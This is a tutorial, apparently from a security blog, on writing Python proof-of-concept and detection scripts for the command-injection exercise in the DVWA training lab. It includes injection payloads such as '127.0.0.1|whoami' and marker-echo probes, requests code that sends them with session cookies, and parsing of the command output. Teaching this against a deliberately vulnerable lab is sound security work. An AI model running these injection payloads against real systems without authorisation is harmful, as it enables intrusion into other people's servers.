A simple exercise, starting with the DVWA lab.
First, analyze the request packet.
The complete request:
POST /DVWA-master/vulnerabilities/exec/ HTTP/1.1
Host: 192.168.52.166:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.52.166:81
Connection: keep-alive
Referer: http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/
Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
Upgrade-Insecure-Requests: 1
POST data:
ip=127.0.0.1|whoami
Submit=Submit
The normal request script:
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip": "127.0.0.1|whoami",
        "Submit": "Submit"}
response = requests.post(URL, data, allow_redirects=False)
print("状态{}".format(response.status_code))
# response.next is only set when the reply is a redirect (302 here, since we are not logged in)
print("302跳转地址{}".format(response.next.url))
What the script needs: the target URL and the POST data, written into the request, and then the response information printed out.
I have to mention that an interviewer once asked me which libraries are needed to write a PoC script; unbelievable.
Since no user authentication information was included, the request is redirected to the login page.
Next, add the request's cookie:
Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip": "127.0.0.1|whoami",
        "Submit": "Submit"}
header = {"cookie": "PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL, data, allow_redirects=False, headers=header)
print("状态{}".format(response.status_code))
if response.status_code == 302:
    print("302跳转地址{}".format(response.next.url))
If you want to print the response body:
print("text{}".format(response.text))
Based on the above, the requirements for writing a PoC are summarised; now write a quick vulnerability-detection script.
Detection principle: if the echoed content contains a custom marker string of our own, the target is vulnerable.
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip": "127.0.0.1|echo wangxinyu",
        "Submit": "Submit"}
header = {"cookie": "PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL, data, allow_redirects=False, headers=header)
print("状态{}".format(response.status_code))
print("text{}".format(response.text))
if response.status_code == 302:
    # not logged in (stale session cookie): the response says nothing about the vulnerability
    print("302跳转地址{}".format(response.next.url))
elif response.status_code == 200 and response.text.find("wangxinyu") != -1:
    print("[*] {} is weak".format(URL))
else:
    print("[x] {} is safe".format(URL))
The line `if response.status_code == 200 and response.text.find("wangxinyu") != -1:` means: if the marker wangxinyu is found in the echoed content, the target is vulnerable.
Printing specific information from a specific position in the page
# coding=utf-8
import requests
url = "http://192.168.17.5/vulnerabilities/exec/"
# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low
headers = {"cookie": "PHPSESSID=3eabqr5lprmsir8n0211bolpn1; security=low"}
data = {"ip": "192.168.111.129&&echo sechelper", "Submit": "Submit"}
# do not follow redirects: allow_redirects=False
response = requests.post(url, data, allow_redirects=False, headers=headers, timeout=5)
if response.status_code == 200:
    from bs4 import BeautifulSoup
    soup = BeautifulSoup(response.text, 'lxml')
    # find the first <pre> tag in the HTML; its text is the command output
    pre = soup.find("pre")
    if pre is not None:
        print("[*] response {}".format(pre.text))
print("Detection completed...")
Use a scraping library to search for the pre content:
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.text, "html.parser")
# find the first <pre> tag in the HTML; its text is the command output
pre = soup.find("pre")
print("[*] response {}".format(pre.text))
pre is the tag that holds the command output.
Output
Summary: writing a PoC
First log in.
Logging in needs the target URL, the POST data, and the cookie written into the header.
Then find the thing you want to display.
Locate the tag and match the vulnerable page with a regex or a parser.
Vulnerability-detection approach:
When there is an echo, use a matching function such as find to search the echoed content for the custom marker string.
The case without an echo is covered in the next article.
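As an added example (not code from the original post), the detection rule summarised above, run offline against constructed DVWA-style response bodies instead of a live target. It uses only the standard library: `extract_pre_text` does what `soup.find("pre").text` does in the post, and `classify` applies the post's rule (200 plus marker in the body means vulnerable, 302 means not logged in). It also adds a narrower check, `classify_by_output`, that searches only the `<pre>` text, which avoids a false positive when the page merely reflects the submitted input back in the form. The sample HTML, the marker and all function names are assumptions of this example.

```python
# Added example, not from the original post: the post's detection logic run offline
# against constructed response bodies (no network, no real target).
from html.parser import HTMLParser


class FirstPreExtractor(HTMLParser):
    """Collect the text of the first <pre> element, like soup.find("pre").text."""

    def __init__(self):
        super().__init__()
        self._in_pre = False
        self._done = False
        self.text = None  # stays None when the page has no <pre> at all

    def handle_starttag(self, tag, attrs):
        if tag == "pre" and not self._done:
            self._in_pre = True
            self.text = ""

    def handle_data(self, data):
        if self._in_pre:
            self.text += data  # data may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "pre" and self._in_pre:
            self._in_pre = False
            self._done = True


def extract_pre_text(html):
    """Return the text of the first <pre> tag, or None if there is none."""
    parser = FirstPreExtractor()
    parser.feed(html)
    parser.close()
    return parser.text


def classify(status_code, body, marker):
    """The post's rule: 302 -> not logged in; 200 with marker anywhere in body -> weak."""
    if status_code == 302:
        return "redirect"
    if status_code == 200 and body.find(marker) != -1:
        return "weak"
    return "safe"


def classify_by_output(status_code, body, marker):
    """Narrower rule: only count the marker if it appears in the command-output <pre> block."""
    if status_code == 302:
        return "redirect"
    output = extract_pre_text(body) if status_code == 200 else None
    if output is not None and output.find(marker) != -1:
        return "weak"
    return "safe"


MARKER = "wangxinyu"  # assumed marker, as in the post

# Constructed sample responses (not captured from any real target).
SAMPLE_VULNERABLE = ("<html><body><div class='vulnerable_code_area'>"
                     "<pre>PING 127.0.0.1 ...\nwangxinyu\n</pre></div></body></html>")
SAMPLE_SAFE = "<html><body><pre>PING 127.0.0.1 ...\n</pre></body></html>"
# Input reflected into the form field but never executed: whole-body search would misfire.
SAMPLE_REFLECTED = ("<html><body><input type='text' name='ip' value='127.0.0.1|echo wangxinyu'>"
                    "<pre>PING 127.0.0.1 ...\n</pre></body></html>")
SAMPLE_LOGIN = "<html><body>Login</body></html>"

if __name__ == "__main__":
    cases = ((200, SAMPLE_VULNERABLE), (200, SAMPLE_SAFE),
             (200, SAMPLE_REFLECTED), (302, SAMPLE_LOGIN))
    for status, body in cases:
        print("status {} body-search={} pre-search={} pre={!r}".format(
            status, classify(status, body, MARKER),
            classify_by_output(status, body, MARKER), extract_pre_text(body)))
```

The third sample is the reason for the narrower check: the whole-body `find` used in the post reports it as weak because the marker is echoed back inside the form, while searching only the `<pre>` output correctly reports it as safe.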